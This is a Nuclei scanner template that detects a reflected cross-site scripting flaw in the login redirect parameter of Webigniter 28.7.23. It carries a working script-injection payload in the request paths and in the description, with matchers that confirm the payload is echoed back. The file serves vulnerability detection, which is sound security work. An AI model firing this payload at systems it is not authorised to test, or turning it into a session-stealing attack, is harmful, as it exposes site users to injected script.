nuclei-templates/http/vulnerabilities/other/webigniter-xss.yaml

44 lines
1.7 KiB
YAML

id: webigniter-xss
info:
name: Webigniter 28.7.23 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ycsz3"><script>alert(1)</script>bn76w was submitted in the redirect parameter. This input was echoed unmodified in the application's response. By using this Java Script injection, the attacker can trick a lot of users into visiting his dangerous URL which is reflected on the login form, before they log in, warning them that there is a problem with the login
reference:
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-XSS-Reflected
- https://webigniter.net
metadata:
verified: true
max-request: 2
tags: xss,webigniter
http:
- method: GET
path:
- '{{BaseURL}}/cms/login?redirect=cmsycsz3%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2fscript>bn76w'
- '{{BaseURL}}/login?redirect=cmsycsz3%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2fscript>bn76w'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- "Webigniter"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a0047304502202b5892c130fae79ae0bf8897937cfb3c0ee38a5027dae47d37b3b5720d6f954c022100e205b44352138dbd48e827d0056757829fbff83d9ddc32447398dc94cf6b5f47:922c64590222798bb761d5b6d8e72950